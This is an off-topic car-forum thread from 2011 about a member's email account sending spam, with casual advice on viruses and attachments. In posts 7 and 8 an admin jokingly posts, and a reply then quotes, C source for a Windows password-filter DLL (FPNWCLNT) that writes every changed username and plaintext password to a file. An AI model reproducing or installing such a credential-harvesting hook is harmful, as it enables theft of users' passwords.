Lounge For casual talk about things unrelated to General Motors. In other words, off-topic stuff. And anything else that does not fit Section Description.

Gettin chewed out...

Thread Tools
 
Old Jan 27, 2011 | 08:58 PM
  #1  
bo58gardner's Avatar
Thread Starter
Senior Member
Posts like a Northstar
 
Joined: Apr 2010
Posts: 518
Likes: 0
bo58gardner is on a distinguished road
Default Gettin chewed out...

Apparently someone hacked into my email and sent all my contacts (only 5 people) some link to cialis and viagra website... It sent to 3 males and 2 females and one girl happenes to be my ex and one of the males happens to be her dad... shes getting pissed off at me about it. So I changed my password around in hopes that it doesnt happen again. Just thought I'd share.
Reply
Old Jan 27, 2011 | 08:59 PM
  #2  
sseidriver97's Avatar
Senior Member

True Car Nut
 
Joined: Mar 2010
Posts: 7,124
Likes: 8
From: Portage mi
sseidriver97 is on a distinguished road
Default

damn sucks dude at least she is an Ex just explain to em what happend and if they dont calm down oh well its not your fault lol
Reply
Old Jan 27, 2011 | 09:06 PM
  #3  
Danthurs's Avatar
Retired Senior Admin

Expert Gearhead
 
Joined: May 2006
Posts: 29,661
Likes: 43
From: Sheboygan Wisconsin
Danthurs is a name known to allDanthurs is a name known to allDanthurs is a name known to allDanthurs is a name known to allDanthurs is a name known to allDanthurs is a name known to all
Default

Check your computer. My sons computer got a virus on it that was sending out spam. I cleaned it up and it all stopped.
Reply
Old Jan 28, 2011 | 11:12 AM
  #4  
SilverSleeper8704's Avatar
Senior Member
Posts like a Turbo
 
Joined: Jan 2010
Posts: 441
Likes: 1
From: "Upstate" NY. Where cows outnumber people
SilverSleeper8704 is on a distinguished road
Default

What email client are you using?
GMail has done pretty good for me so far. I have a GMail account and a yahoo. So far, no hacks. But I get a ton less spam in my GMail account. But I've heard aol and hotmail accounts are supposedly easier to hack. My sisters hotmail account got hacked just a few weeks ago, and shes really careful with it.
Reply
Old Jan 28, 2011 | 11:18 AM
  #5  
Jonpro03's Avatar
Senior Member
True Car Nut
 
Joined: Jul 2010
Posts: 2,469
Likes: 0
From: Danville, Illinois
Jonpro03 is on a distinguished road
Default

Here'* your new password, memorize it

@ö^k20PÉaa2qk5

hack that...
Reply
Old Jan 28, 2011 | 11:45 AM
  #6  
GXP Venom's Avatar
Administratus Emeritus
Certified Car Nut
 
Joined: Jan 2006
Posts: 16,539
Likes: 18
From: Purgatory, Pennsylvania
GXP Venom is on a distinguished road
Default

This is happening more and more and ARE Majority NOT HACKS!. Most are Email worms riding attachments with commercial intent (But more and more malevolent intent) and you can have any client or virus protection you think are superior. IT""* NOT LOL

Worms are getting so small in structure and coders have found ways to piggyback them to .jpg'* and the like. Virus software is yet to come to grips with this and you click, you get it. So how to you protect yourself best. Do not allow attachments to auto open. When you know it'* a "Hey look at this" kind of attachment, tell the idiotic, likes funny pictures, mails crap because he deosn't want people to think He/She'* anti American/God/Whatever or the engine'* gonna fall out of the f'in sky and kill them if they don't forward to 10 more people they think are just as idiotic; GROWL! ; delete it and reply: Stop being a MORON and sending me this crap or your BLOCKED. I've personally offend quite a few lately and really don't care anymore. I can find all the neat things to occupy my time, and could car less what people think of my politics, religion, and don't believe objects fall out of the sky with a target intended, (unless your an enemy of the CIA or Israel) so stop sending me stupid ****.

Reply
Old Jan 28, 2011 | 02:25 PM
  #7  
GXP Venom's Avatar
Administratus Emeritus
Certified Car Nut
 
Joined: Jan 2006
Posts: 16,539
Likes: 18
From: Purgatory, Pennsylvania
GXP Venom is on a distinguished road
Default

Originally Posted by Jonpro03
Here'* your new password, memorize it

@ö^k20PÉaa2qk5

hack that...
Hahahaha!!!
Here, put this in your System 32 folder and I'll tell you all your passwords:


FPNWCLNT.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING **
USHORT len;
USHORT maxlen;
WCHAR *buff;
};

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
**
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out",
GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}

LONG __stdcall PasswordChangeNotify (
struct UNI_STRING *user,
ULONG rid,
struct UNI_STRING *passwd
)
**
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;

memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %* : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %* : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

return 0L;
}
-----------------------end of
FPNWCLNT.c------------------------------------
Reply
Old Jan 29, 2011 | 02:46 AM
  #8  
bo58gardner's Avatar
Thread Starter
Senior Member
Posts like a Northstar
 
Joined: Apr 2010
Posts: 518
Likes: 0
bo58gardner is on a distinguished road
Default

Originally Posted by GXP Venom
Hahahaha!!!
Here, put this in your System 32 folder and I'll tell you all your passwords:


FPNWCLNT.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING **
USHORT len;
USHORT maxlen;
WCHAR *buff;
};

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
**
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out",
GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}

LONG __stdcall PasswordChangeNotify (
struct UNI_STRING *user,
ULONG rid,
struct UNI_STRING *passwd
)
**
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;

memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %* : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %* : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

return 0L;
}
-----------------------end of
FPNWCLNT.c------------------------------------

... um I dont know what that is...
Reply
Old Jan 29, 2011 | 01:22 PM
  #9  
GXP Venom's Avatar
Administratus Emeritus
Certified Car Nut
 
Joined: Jan 2006
Posts: 16,539
Likes: 18
From: Purgatory, Pennsylvania
GXP Venom is on a distinguished road
Default

Simple exploit to extract passwords.. Key things removed. These are a dime a dozen on the net.
Reply
Related Topics
Thread
Thread Starter
Forum
Replies
Last Post
ggenovez
1992-1999
5
Jun 28, 2015 12:53 PM
richbak73
Buick
17
Mar 2, 2014 01:49 AM
richbak73
General GM Chat
1
Feb 25, 2014 12:47 PM
STENZEL7
1992-1999
0
Feb 28, 2009 12:59 PM
chadow427
2000-2005
5
Dec 14, 2005 12:23 AM




All times are GMT -4. The time now is 10:06 PM.